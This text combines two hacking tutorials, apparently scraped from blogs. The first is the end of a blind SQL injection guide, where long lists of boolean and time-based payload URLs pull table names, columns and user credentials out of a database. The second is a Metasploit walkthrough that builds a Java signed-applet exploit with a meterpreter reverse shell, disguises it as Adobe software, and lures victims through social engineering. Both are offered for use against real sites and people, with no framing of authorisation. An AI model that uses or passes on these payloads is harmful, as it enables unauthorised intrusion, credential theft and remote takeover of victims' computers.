·         http://www/site.com/index.php?id=725’ and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>112
o   TRUE – still need to continue moving higher
·         http://www/site.com/index.php?id=725’ and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>113
o   FALSE – indicating we have gone too far – WTF?
·         http://www/site.com/index.php?id=725’ and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>111
o   TRUE – Indicating we need to move up

As you can see this can take some time. In the example above we would use some reasoning and determine that the char value is greater than 111, but less than 113. When we ran the test against 112 it indicated as true thus meaning it is greater than OR equal to 112. If we convert this we get the letter “p”. OK so we have the first letter, now let’s adjust our LIMIT at the end to move on to the second character position. We will also do our best to use our brains to speed things up and start guessing the next logical character to follow a “p” (like maybe an “a” = 97). It now looks like this:

·         http://www/site.com/index.php?id=725’ and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),2,1))>97
o   TRUE – Indicating we need to move up
·         http://www/site.com/index.php?id=725’ and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),2,1))>98
o   FALSE – indicating we have gone too far and that we were right with the guess of an “a” which is the char value for 97

OK so we have no found the first two letters of the password which are “pa”, let’s keep guessing….
·         http://www/site.com/index.php?id=725’ and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),3,1))>115
o   TRUE – Indicating we need to move up
·         http://www/site.com/index.php?id=725’ and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),3,1))>116
o   FALSE – indicating we have gone too far and that we were right on track with the guessing of an “s” which is the char value for 115…wonder what’s next?
·         http://www/site.com/index.php?id=725’ and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),4,1))>116
o   FALSE – indicating we have gone to far and found us another “s” or 115
·         http://www/site.com/index.php?id=725’ and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),4,1))>115
o   TRUE – indicating we have found another “s”

When we put it together we have found char values of 112, 97, 115, & 115 which when converted equates to “pass”. The admin with userid=1 has a password of “pass”.  In some cases the char values may be for an MD5 hash so it might not come across until you have the entire thing. You can keep adjusting the LIMIT value until you no longer get any return values (i.e. ERRORS) indicating there are no more character positions to enumerate.

NOTE: To help speed things up we can use the start and end point for the ASCII chart which starts “A” at 65 and has “z” at 122. You can then use the results to narrow down your search to more appropriate section or letter. I tend to focus on the lower case options first (97-122) to speed things up, but the full chart can come into play in the wild. I will be working to add a page or post with a full ASCII conversion chart but is a pain to put it into HTML table format so it will format correctly on this blog (I already tried several times to take an easier route, but will have this up in a few weeks’ time so please check back.

This brings my tutorial on BLIND SQL Injection to an end as we have now covered things from find to extraction. I hope you have been able to follow along and find the information helpful. Please remember to check my other pages for more tutorials on other methods or tools. I have also included some extras below for additional reference. Until next time…Enjoy!

Laters – H.R.

EXTRA REFERENCE MATERIAL:
USING MID() TO CHECK VERSION:
·         http://www.site.com/index.php?id=725 AND 1=1--       
o   No Errors
·         http://www.site.com/index.php?id=725 AND 1=2—
o   Errors!
·         http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 1, 1)) > 51
o   TRUE – go higher
·         http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 1, 1)) > 53
o   TRUE = go higher
·         http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 1, 1)) > 52
o   TRUE – go higher
·         http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 1, 1)) > 54
o   FALSE = CHAR=53
·         http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 2, 1)) > 43
o   TRUE – does not use “+” for separation of version digits, go higher
·         http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 2, 1)) > 45
o   TRUE – does not use “-” for separation of version digits, go higher
·         http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 2, 1)) > 46
o   TRUE – uses “.” for separation of version digits as if we tested 47 next it would be FALSE
·         http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 3, 1)) > 51
o   FALSE = must be lower
·         http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 3, 1)) > 49
o   FALSE = must be lower
·         http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 3, 1)) > 48
o   TRUE – indicating CHAR=48
·         MID() – can be used to extract characters from a text field

RESULTS = 53, 46, 48, which converts to “5.0”. You would simply keep increasing the LIMIT to move forward character positions until you hit the end and error out. You usually don’t have to check the “-“ or “+” signs until further down the version description (i.e. 5.0.1+log or 5.3.7-community) but thought I would show you how to test for them in the examples.

SUPER FAST MINI-TUT ON TIME-BASED INJECTIONS:
The syntax will change, but the overall method is similar to the previous examples however we will be using time to determine TRUE/FALSE results (if vulnerable the time delays will be noticed before the page refreshes). You may need to adjust the time settings to fit your need but these will get you started.

TIME-BASED Injection - Vulnerability Testing:
o   INTEGER: http://[site]/page.asp?id=1; WAITFOR DELAY '00:00:10'-- (+10 seconds)
o   STRING: http://[site]/page.asp?id=x'; WAITFOR DELAY '00:00:10'--+- (+10 seconds)

TIME-BASED Extraction of CURRENT DATABASE USER
Determine Length of USER:
·         http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
·         http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
·         http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--
·         http://[site]/page.asp?id=1; IF (LEN(USER)=4) WAITFOR DELAY '00:00:10'--
·         http://[site]/page.asp?id=1; IF (LEN(USER)=5) WAITFOR DELAY '00:00:10'-- (+10 seconds)
o   Result = 5 characters in length

Determine length, and then try to find out CHAR value one character position at a time, like this:
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>96) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>100) WAITFOR DELAY '00:00:10'--
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>98) WAITFOR DELAY '00:00:10'--
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
o   Result = the first character CHAR value is 97 which is an “a”
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>99) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
o   Result = the second character CHAR value is 100 which is a “d”
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>108) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'—
o   Result = third character CHAR value is 109 which is the letter “m”
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),4,1)))>104) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),4,1)))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
o   Result = the fourth character CHAR value is 105 which is an “i”
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),5,1)))>109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),5,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
o   the fifth character position has CHAR value of 110 which is the letter “n”

Database User = 97,100,109,105,110 = admin


TIME-BASED Extraction of CURRENT DATABASE NAME
This follows the same method as used above to grab the USER, but we will change the reference to DB_NAME(). Again, we will need to check the length first and then to use the LIMIT to move from one character position to the next until we have captured all values and then convert. It looks like this:
·         http://[site]/page.asp?id=1; IF (LEN(DB_NAME())=6) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),1,1)))=116) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),2,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),3,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),4,1)))=116) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),5,1)))=68) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),6,1)))=66) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Database Name = 116,101,115,116,68,66 = testDB

TIME-BASED Extraction of 1st TABLE IN DB:
This will get the first table name of the current database.
·         http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype='U')=7) WAITFOR DELAY '00:00:10'-- (+10 seconds)
o   Result = DBNAME of 7 characters in length
§  Remember you can use greater than or less than symbols to help narrow things down when starting from the unknown
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=77) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),4,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),5,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),5,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),5,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Table Name =77,101,109,98,101,114,115 = Members

TIME-BASED Extraction of 2nd TABLE IN DB:
·         http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’Members’)=6) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'Members'),1,1)))=106) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'Members'),2,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'Members'),3,1)))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'Members'),4,1)))=99) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'Members'),5,1)))=121) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'Members'),6,1)))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Table Name = 106,117,105,99,121,49 = juicy1

NOTE: Increment and replace the referenced table in the first request to get additional table names, meaning the next request would look something like this:
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'juicy1'),1,1)))=65) WAITFOR DELAY '00:00:10'--

TIME-BASED Extraction of 1st TABLE COLUMNS:
Now that you have figured out the database name and first table name let’s enumerate some columns from the table(s) we found. It will look like this for the first column from the first table:
·         http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members')=4) WAITFOR DELAY '00:00:10'-- (+10 seconds)
o   Remember to help you out and speed things up you can check the length before you start testing away
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Column Name = 117,115,101,114 = user

TIME-BASED Extraction of 2nd COLUMN NAME:
·         http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'user')=4) WAITFOR DELAY '00:00:10'-- (+10 seconds)
o   Length check
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'user'),1,1)))=80) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'user'),2,1)))=65) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'user'),3,1)))=83) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'user'),4,1)))=83) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Column Name = 80,65,83,83 = PASS

TIME-BASED Extraction of 3rd COLUMN NAME:
·         http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>,'PASS')=6) WAITFOR DELAY '00:00:10'-- (+10 seconds)
o   Length Check
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'PASS'),1,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'PASS'),2,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'PASS'),3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'PASS'),4,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'PASS'),5,1)))=73) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'PASS'),6,1)))=68) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Column Name = 117,115,101,114,73,68 = userID

TIME-BASED Extraction of Data:
We will be extracting information now that we have gotten the table (Members) and column names (user, PASS, & userID), from the current database (testDB). We will unfortunately need to extract the results one field at a time. In order to get the first field (user) from the Members table starting on row 1 we would do this:  

·         http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 user from Members)=5) WAITFOR DELAY '00:00:10'-- (+10 seconds)
o   Length Check
·         http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 user from Members),1,1))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 user from Members),2,1))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 user from Members),3,1))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 user from Members),4,1))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 user from Members),5,1))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Results for first user entry = 97,100,109,105,110 = admin

Now to get the next column:
·         http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 PASS from Members)=4) WAITFOR DELAY '00:00:10'-- (+10 seconds)
o   Length Check
·         http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from Members),1,1))=112) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from Members),2,1))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from Members),3,1))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from Members),3,1))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Results = 112, 97, 115, & 115 = pass

Now to get the userID:
·         http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 userID from Members)=1) WAITFOR DELAY '00:00:10'-- (+10 seconds)
o   Length Check
·         http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 userID from Members),1,1))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Results = 49 = 1

Overall Results FOR ROW 1:
·         admin::pass::1

EXTRACTION OF 2nd ROW DATA:
·         http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 user from Members where user NOT in ('admin') order by Members desc)=2) WAITFOR DELAY '00:00:10'-- (+10 seconds)
o   Length Check
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 user from Members where user NOT in ('admin') order by Members desc),1,1)))=72) WAITFOR DELAY '00:00:10'-- (+10 seconds)
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 user from Members where user NOT in ('admin') order by Members desc),2,1)))=82) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Results = 72 & 82 = HR

Repeat as needed using same method as above for ROW 1 to get additional columns for ROW 2. Then we will increment again and use the last found results in our NOT statement to keep things moving along. If we were to keep going it would look like this:

·         http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 user from Members where user NOT in ('HR') order by Members desc)=<length-to-check>) WAITFOR DELAY '00:00:10'-- (+10 seconds)
o   Length Check
·         http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 user from Members where user NOT in ('HR') order by Members desc),1,1)))<insert<>=here><insert-char-value-here>) WAITFOR DELAY '00:00:10'-- (+10 seconds)

That concludes my coverage of TIME-BASED BLIND INJECTIONS. I can’t show the photos so hopefully it makes sense. Try adjusting the times until you find something that works. A great method to learn this is to wait until you have found a site you can get with a tool (like SQLMAP) that confirms the method used was time based. Then you can manually test afterwards to see how things work. Really hope you appreciate this one as this took the longest to organize and make sense of. If you have any other methods that I missed than can be easily documented please let me know so I can update this write up. Until next time…Enjoy!

sourece : http://kaoticcreations.blogspot.com

JAVA SIGNED APPLET EXPLOIT



This exploit dynamically creates a .jar file via the Msf:: Exploit::Java mixin, then signs the it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim’s JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the “Publisher” line. Newer JVMs display “UNKNOWN” when the signature is not trusted (i.e., it’s not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks “run”, the applet executes with full user permissions.

Open backtrack terminal type msfconsole

Now type use exploit/multi/browser/java_signed_applet press enter

Msf exploit (Java_signed-applet)>Set payload windows/meterpreter/reverse_tcp

Msf exploit (Java_signed-applet)>Set appletname adobe (The main applet’s class name)

Msf exploit (Java_signed-applet)>Set certcn adobe player (value for the certificate)

Msf exploit (Java_signed-applet)>Set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (Java_signed-applet)>Set srvport 80 (The local port to listen on default: 8080)

Msf exploit (Java_signed-applet)>Set uripath adobevideos (The Url to use for this exploit)

Msf exploit (Java_signed-applet)>Set lport 443

Msf exploit (Java_signed-applet)>exploit 

Now an URL you should give to your victim http://192.168.1.4/adobevideos

Send the link of the server to the victim via chat or email or any social engineering technique.
When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.

You now have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

VIDEO TUTORIAL: http://adf.ly/OUZOp

soruce : http://backtrack-page.blogspot.com